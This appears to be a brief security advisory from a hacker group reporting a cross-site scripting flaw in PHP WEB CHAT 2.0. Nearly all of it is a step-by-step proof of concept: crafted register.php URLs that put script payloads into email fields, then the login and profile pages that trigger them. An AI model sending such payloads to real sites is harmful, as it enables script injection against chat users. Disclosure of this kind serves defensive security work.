Product: PHP WEB CHAT Version: 2.0 OffSite: http://www.webscriptworld.com Problem: Cross Site Scripting -------------------------------------------- Actions: 1)Register http://[victim]/chat_dir/register.php?register=yes&username=OverG&email=<scr*pt>alert%20("Test!")</scr*pt>&email1=<scr*pt>alert%20("Test!")</scr*pt> 2)To return the lost password and CSS is carried out (email) http://[victim]/chat_dir/login.php?option=lostpasswd&username=OverG 3)View profile (email1) http://[victim]/chat_dir/profile.php?username=OverG Contacts: www.overg.com www.dwcgr0up.com irc.zaingandol.org #DWC ogprog@ukr.net Best regards, Over G[DWC Gr0up] P.S. Sorry for my English :)
